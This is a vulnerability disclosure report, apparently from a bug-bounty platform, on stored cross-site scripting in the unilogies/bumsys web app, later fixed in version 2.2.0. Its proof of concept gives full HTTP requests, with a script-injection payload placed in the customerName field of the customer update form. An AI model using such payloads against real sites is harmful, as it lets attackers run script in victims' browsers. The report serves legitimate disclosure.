Multiple XSS on update functions with module select options and search form in unilogies/bumsys

Valid

Reported on

Mar 29th 2023


Description

The XSS vulnerability occurs in forms that have select options and a search field.

Proof of Concept

POST /bumsys/xhr/?module=peoples&page=updateCustomer HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------308170463032889995491505595073
Content-Length: 2215
Origin: http://localhost
Connection: close
Referer: http://localhost/bumsys/peoples/customer-list/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerName"

test2"><script>alert('edit')</script>
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerNameLocalLen"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerType"

Distributor
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPhone"

123
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerEmail"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerOpeningBalance"

11.00
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerShippingRate"

0.0000
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDiscount"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerSendNotification"

0
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDivision"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerDistrict"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerUpazila"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerPostalCode"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerCountry"

Bangladesh
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerWebsite"


-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customerAddress"

  
-----------------------------308170463032889995491505595073
Content-Disposition: form-data; name="customer_id"

3
-----------------------------308170463032889995491505595073--

Ajax Loader:

GET /bumsys/xhr/?module=my-shop&page=editDiscount&id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: 0ff078f9716f33e90c8ceb170867be09ff1b379a
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/bumsys/my-shop/discounts/
Cookie: __e80d6ab52f32c63981a432872f0499f854e14685=t838t9fdikqhconbfnr7dkhap7; eid=1; currencySymbol=%E0%A7%B3; keepAlive=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Step 1. Create a new customer without the payload. [screenshot: customer list]
Step 2. Add a discount on My Shop. [screenshot]
Step 3. Edit the customer name. [screenshot: customer list after editing]
Step 4. Edit the discount and view the alert. [screenshot]
Please check all ajax module functions and html_entity_decode.
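As an added illustration (not code from the report or from bumsys), the Python model below mirrors the pattern the note above points at: a customerName value that is entity-encoded when stored, then decoded html_entity_decode-style and interpolated raw when the edit form and its select option are built, shown beside the output-escaped version. The payload string is constructed to match the shape of the PoC, and contains_live_script is an assumed detection helper, not anything from the project.

```python
import html
import re

# Constructed sample shaped like the customerName value in the PoC request.
PAYLOAD = "test2\"><script>alert('edit')</script>"


def store_customer_name(raw: str) -> str:
    """Input-time sanitisation: the value is entity-encoded before it is stored
    (the Python equivalent of htmlspecialchars)."""
    return html.escape(raw, quote=True)


def render_edit_form_vulnerable(stored: str) -> str:
    """The flagged pattern: the stored value is decoded again (html_entity_decode
    style) and dropped unescaped into an attribute and a <select> option when
    the ajax loader builds the edit form, so the original markup comes back."""
    decoded = html.unescape(stored)
    return (
        f'<input name="customerName" value="{decoded}">'
        f'<select name="customer"><option value="3">{decoded}</option></select>'
    )


def render_edit_form_fixed(stored: str) -> str:
    """Hardened form: whatever was stored, escape at the point of output.
    Decoding first is harmless only because the result is re-escaped."""
    safe = html.escape(html.unescape(stored), quote=True)
    return (
        f'<input name="customerName" value="{safe}">'
        f'<select name="customer"><option value="3">{safe}</option></select>'
    )


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(markup: str) -> bool:
    """Assumed detection helper: true when a real <script> start tag survives
    into the rendered markup, i.e. user input broke out of its context."""
    return _SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    stored = store_customer_name(PAYLOAD)
    print("vulnerable:", contains_live_script(render_edit_form_vulnerable(stored)))
    print("fixed:     ", contains_live_script(render_edit_form_fixed(stored)))
```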

Impact

In general, stored XSS occurs when an attacker injects malicious content (often referred to as the “payload”) as user input and it is stored on the target server, such as in a message forum, comment field, visitor log, database, etc.

When the victim opens the web page in a browser, the malicious data is served to the victim’s browser like any other legitimate data, and the victim ends up executing the malicious script once it is viewed in their browser.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back 2 months ago
Khurshid Alam validated this vulnerability 2 months ago
TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
TuanTH
2 months ago

Researcher


Can you assign a CVE for this vulnerability please? It would be very nice

Khurshid Alam
2 months ago

Thank you. We are working with some functionality. We will update soon. Thanks

Khurshid Alam marked this as fixed in 2.2.0 with commit 1b426f a month ago
Khurshid Alam has been awarded the fix bounty
This vulnerability will not receive a CVE
Khurshid Alam published this vulnerability a month ago
ajax.php#L543-L610 has been validated
ajax.php#L1209-L1253 has been validated
ajax_select2.php#L677-L706 has been validated
ajax.php#L78-L178 has been validated
ajax.php#L2158-L2208 has been validated
Khurshid Alam
a month ago

@admin, please assign a CVE.

Pavlos
23 days ago

Admin


ok :)
